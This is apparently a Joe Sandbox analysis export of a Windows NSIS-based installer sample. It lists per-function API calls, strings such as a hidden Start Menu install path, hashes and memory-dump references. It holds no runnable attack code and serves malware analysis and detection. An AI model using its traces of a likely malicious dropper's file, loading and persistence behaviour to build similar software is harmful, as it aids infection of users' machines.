String ID: "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous$C:\Users\user\Desktop$C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-734743977
Opcode ID: c37161eddd1839db3a1dd77df7f1c87030544e8cf131142df7becf6cb2043db2
Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
Opcode Fuzzy Hash: c37161eddd1839db3a1dd77df7f1c87030544e8cf131142df7becf6cb2043db2
Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

Function 6FC61BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6FC612BB: GlobalAlloc.KERNELBASE(00000040,?,6FC612DB,?,6FC6137F,00000019,6FC611CA,-000000A0), ref: 6FC612C5

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FC61D2D
lstrcpyW.KERNEL32(00000008,?), ref: 6FC61D75
lstrcpyW.KERNEL32(00000808,?), ref: 6FC61D7F
GlobalFree.KERNEL32(00000000), ref: 6FC61D92
GlobalFree.KERNEL32(?), ref: 6FC61E74
GlobalFree.KERNEL32(?), ref: 6FC61E79
GlobalFree.KERNEL32(?), ref: 6FC61E7E
GlobalFree.KERNEL32(00000000), ref: 6FC62068
lstrcpyW.KERNEL32(?,?), ref: 6FC62222
GetModuleHandleW.KERNEL32(00000008), ref: 6FC622A1
LoadLibraryW.KERNEL32(00000008), ref: 6FC622B2
GetProcAddress.KERNEL32(?,?), ref: 6FC6230C
lstrlenW.KERNEL32(00000808), ref: 6FC62326

Memory Dump Source

Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 11f4943c81eb118fe5fecc4f03b55151bcfa5a8e75cada2f64096377d6f14982
Instruction ID: 0969f6c1383ea7bdd73aeeff7667945c010d30b659402accf30317cb29bc2ec4
Opcode Fuzzy Hash: 11f4943c81eb118fe5fecc4f03b55151bcfa5a8e75cada2f64096377d6f14982
Instruction Fuzzy Hash: 62229B71D0C60ADADF10CFA9C5D46EEB7B4FF05B1AF10462AD1A5E6280F770AA81CB51

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,00000000), ref: 00405D9D
lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,75923420,75922EE0,00000000), ref: 00405DE5
lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E08
lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E0E
FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,75923420,75922EE0,00000000), ref: 00405E1E
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
FindClose.KERNEL32(00000000), ref: 00405ECD

Strings

., xrefs: 00405E43
., xrefs: 00405E2F
\*.*, xrefs: 00405DDF
PWB, xrefs: 00405DCD

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$PWB$\*.*
API String ID: 2035342205-2468439962
Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous
API String ID: 542301482-647064374
Opcode ID: bf3cff04906a8fef3a301f9eed657051bf574afb9f0f1a3cc87761232435f051
Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
Opcode Fuzzy Hash: bf3cff04906a8fef3a301f9eed657051bf574afb9f0f1a3cc87761232435f051
Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(75923420,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0), ref: 004069A9
FindClose.KERNEL32(00000000), ref: 004069B5

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1358fc4729cd4e161e3f995057c9de5906a44dd4f8dff08d490623953bdc3ea8
Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
Opcode Fuzzy Hash: 1358fc4729cd4e161e3f995057c9de5906a44dd4f8dff08d490623953bdc3ea8
Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29

Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405049
GetDlgItem.USER32(?,00000408), ref: 00405054
GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
DeleteObject.GDI32(00000000), ref: 0040512B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
GetWindowLongW.USER32(?,000000F0), ref: 0040526F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
ShowWindow.USER32(?,00000005), ref: 0040528D
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
ImageList_Destroy.COMCTL32(?), ref: 0040545B
GlobalFree.KERNEL32(?), ref: 0040546B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
ShowWindow.USER32(?,00000000), ref: 00405615
GetDlgItem.USER32(?,000003FE), ref: 00405620
ShowWindow.USER32(00000000), ref: 00405627

Strings

N, xrefs: 004052C6
M, xrefs: 004051E5
, xrefs: 004055FF

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
Opcode Fuzzy Hash: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
ShowWindow.USER32(?), ref: 00404121
GetWindowLongW.USER32(?,000000F0), ref: 00404133
ShowWindow.USER32(?,00000004), ref: 0040414C
DestroyWindow.USER32 ref: 00404160
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
GetDlgItem.USER32(?,?), ref: 00404198
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
IsWindowEnabled.USER32(00000000), ref: 004041B3
GetDlgItem.USER32(?,00000001), ref: 0040425E
GetDlgItem.USER32(?,00000002), ref: 00404268
SetClassLongW.USER32(?,000000F2,?), ref: 00404282
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
GetDlgItem.USER32(?,00000003), ref: 00404379
ShowWindow.USER32(00000000,?), ref: 0040439A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
EnableWindow.USER32(?,?), ref: 004043C7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
EnableMenuItem.USER32(00000000), ref: 004043E4
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
SetWindowTextW.USER32(?,00423748), ref: 0040444D
ShowWindow.USER32(?,0000000A), ref: 00404581

Strings

H7B, xrefs: 00404429

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: H7B
API String ID: 121052019-2300413410
Opcode ID: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
Opcode Fuzzy Hash: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D98
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75923420), ref: 00403E18
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning), ref: 00403E7F

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

RegisterClassW.USER32(00429200), ref: 00403EBC
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
RegisterClassW.USER32(00429200), ref: 00403F81
DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0

Strings

_Nb, xrefs: 00403E9B, 00403F03
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D1C
RichEdit, xrefs: 00403F72
Call, xrefs: 00403DDF, 00403DE8, 00403DF6, 00403E45, 00403E4B
RichEd20, xrefs: 00403F45
1033, xrefs: 00403D37, 00403D93
RichEdit20W, xrefs: 00403F63, 00403F69
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning, xrefs: 00403DA7, 00403DAF, 00403E52, 00403E58, 00403E68
RichEd32, xrefs: 00403F53
.exe, xrefs: 00403E25
.DEFAULT\Control Panel\International, xrefs: 00403D83
Control Panel\Desktop\ResourceLocale, xrefs: 00403D4B
H7B, xrefs: 00403D43

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1799503963
Opcode ID: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
Opcode Fuzzy Hash: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

Function 004030D0 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,00000400), ref: 00403100

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 00403149
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B

Strings

C:\Users\user\Desktop, xrefs: 0040312B, 00403130, 00403136
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 004032A3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322
Null, xrefs: 004031C7
soft, xrefs: 004031BE
C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe, xrefs: 004030EA, 004030F9, 0040310D, 0040312A
Inst, xrefs: 004031B5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4
Error launching installer, xrefs: 00403120
uj), xrefs: 00403350

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$uj)
API String ID: 2803837635-398972744
Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
